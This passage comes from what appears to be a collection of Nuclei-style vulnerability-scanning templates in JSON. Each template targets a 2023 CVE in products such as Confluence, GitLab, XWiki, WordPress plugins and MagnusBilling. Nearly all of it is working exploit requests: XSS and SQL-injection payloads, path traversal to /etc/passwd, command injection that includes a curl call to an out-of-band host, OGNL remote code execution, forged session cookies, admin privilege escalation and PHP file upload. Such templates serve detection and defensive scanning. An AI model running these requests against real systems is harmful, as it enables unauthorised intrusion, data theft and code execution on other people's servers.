name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35155","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/Main/?viewer=share&send=1&target=&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E&includeDocument=inline&message={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Applications</h2>","Navigation</h2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6360","info":{"name":"WordPress My Calendar <3.4.22 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar"]}]},{"raw":["@timeout: 20s\nGET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains(body, \"[]\")","duration >= 6"],"condition":"and"}]}]},{"id":"CVE-2023-1408","info":{"name":"Video List Manager <= 1.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"Edit Video\",\"Youtube</option>\")"],"condition":"and"}]}]},{"id":"CVE-2023-5830","info":{"name":"ColumbiaSoft DocumentLocator - Improper Authentication","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /api/authentication/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\n  \"LoginType\":\"differentWindows\",\n  \"User\":\"{{randstr}}\",\n  \"Password\":\"{{rand_base(5, \"abc\")}}\",\n  \"Domain\":\"{{randstr}}\",\n  \"Server\":\"{{interactsh-url}}\",\n  \"Repository\":\"{{randstr}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"Authorized\":false"]}]}]},{"id":"CVE-2023-34993","info":{"name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-30258","info":{"name":"MagnusBilling - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6875","info":{"name":"WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-json/post-smtp/v1/get-log HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"success\\\":true,\", \"{\\\"fcm_token\\\":\\\"{{fcm_token}}\")","contains_all(body_3, \"true,\\\"data\\\":\", \"access_token=\")"],"condition":"and"}]}]},{"id":"CVE-2023-3521","info":{"name":"FOSSBilling < 0.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin?_url=%2Fadmin&date_to='\"><img+src=x+onerror=alert(3)>&date_from='\"><img+src=x+onerror=alert(3)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(3)>","FOSSBilling"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50720","info":{"name":"XWiki < 4.10.15 - Email Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*","{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email</span> :","XWiki.XWikiUsers[0]","email_checked</span>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-43261","info":{"name":"Milesight Routers - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lang/log/httpd.log"],"max-size":5000,"extractors":[{"type":"regex","regex":["\"username\":\"([^\"]+)\",\"password\":\"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)\""]}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-5863","info":{"name":"phpMyFAQ < 3.2.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/index.php?action=ngductung\"><img+src/onerror=\"alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src/onerror=\"alert(document.domain)\">","phpMyFAQ"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-6038","info":{"name":"H2O ImportFiles - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\n","POST /3/ParseSetup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsource_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'ImportFilesV3')","regex('root:.*:0:0:', body_2)","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2624","info":{"name":"KiviCare WordPress Plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src onerror=alert(document.domain)> appointment","status\":true"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-37645","info":{"name":"EyouCms v1.6.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/model/custom_model_path/recruit.filelist.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["application/admin/","template/pc/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1719","info":{"name":"Bitrix Component - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'LOG_CNT':","<img onerror=alert(document.domain) src=1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6389","info":{"name":"WordPress Toolbar <= 2.2.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-0900","info":{"name":"AP Pricing Tables Lite <= 1.1.6 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded\n\naction=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_3>=5","status_code_3 == 200","contains(body_3, \"Security check\")","contains(body_2, \"ap-pricing-tables-lite\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["_wpnonce=([0-9a-z]+)\">Log Out"],"internal":true}]}]},{"id":"CVE-2023-1892","info":{"name":"Sidekiq < 7.0.8 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/queues"],"matchers":[{"type":"word","internal":true,"part":"body","words":["Sidekiq","Dashboard</a>"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src/onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47643","info":{"name":"SuiteCRM Unauthenticated Graphql Introspection","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-XSRF-TOKEN: {{csrftoken}}\n\n{\"query\":\"query IntrospectionQuery {\\r\\n      __schema {\\r\\n        \\r\\n        queryType { name }\\r\\n        mutationType { name }\\r\\n        subscriptionType { name }\\r\\n        types {\\r\\n          ...FullType\\r\\n        }\\r\\n        directives {\\r\\n          name\\r\\n          description\\r\\n          \\r\\n          locations\\r\\n          args {\\r\\n            ...InputValue\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment FullType on __Type {\\r\\n      kind\\r\\n      name\\r\\n      description\\r\\n      \\r\\n      fields(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        args {\\r\\n          ...InputValue\\r\\n        }\\r\\n        type {\\r\\n          ...TypeRef\\r\\n        }\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      inputFields {\\r\\n        ...InputValue\\r\\n      }\\r\\n      interfaces {\\r\\n        ...TypeRef\\r\\n      }\\r\\n      enumValues(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      possibleTypes {\\r\\n        ...TypeRef\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment InputValue on __InputValue {\\r\\n      name\\r\\n      description\\r\\n      type { ...TypeRef }\\r\\n      defaultValue\\r\\n      \\r\\n      \\r\\n    }\\r\\n\\r\\n    fragment TypeRef on __Type {\\r\\n      kind\\r\\n      name\\r\\n      ofType {\\r\\n        kind\\r\\n        name\\r\\n        ofType {\\r\\n          kind\\r\\n          name\\r\\n          ofType {\\r\\n            kind\\r\\n            name\\r\\n            ofType {\\r\\n              kind\\r\\n              name\\r\\n              ofType {\\r\\n                kind\\r\\n                name\\r\\n                ofType {\\r\\n                  kind\\r\\n                  name\\r\\n                  ofType {\\r\\n                    kind\\r\\n                    name\\r\\n                  }\\r\\n                }\\r\\n              }\\r\\n            }\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["userHash","authenticateId","systemGeneratedPassword"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"part":"header","regex":["XSRF-TOKEN=([^;]+)"],"internal":true}]}]},{"id":"CVE-2023-22527","info":{"name":"Atlassian Confluence - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /template/aui/text-inline.vm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded\n\nlabel=aaa\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\\u0027x_vuln_check\\u0027,(new+freemarker.template.utility.Execute()).exec({\"whoami\"}))\n\n"],"matchers":[{"type":"dsl","dsl":["x_vuln_check != \"\"","contains(to_lower(body), 'empty{name=')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["x_vuln_check"]}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25573","info":{"name":"Metersphere - Arbitrary File Read","severity":"high"},"requests":[{"raw":["POST /api/jmeter/download/files HTTP/1.1\nContent-Type: application/json\n\n{\"reportId\":\"{{str}}\",\"bodyFiles\":[{\"id\":\"{{rand}}\",\"name\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/etc/passwd"]},{"type":"word","part":"header","words":["filename=\"{{str}}.zip\"","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43472","info":{"name":"MLFlow < 2.8.1 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/2.0/preview/mlflow/experiments/list"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"experiment_id\\\":\", \"artifact_location\\\":\", \"lifecycle_stage\\\":\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-5360","info":{"name":"WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236\n\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"uploaded_file\"; filename=\"{{file}}.ph$p\"\nContent-Type: image/png\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"allowed_file_types\"\n\nph$p\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"triggering_event\"\n\nclick\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"wpr_addons_nonce\"\n\n{{nonce}}\n-----------------------------318949277012917151102295043236--\n","GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1\nHost: 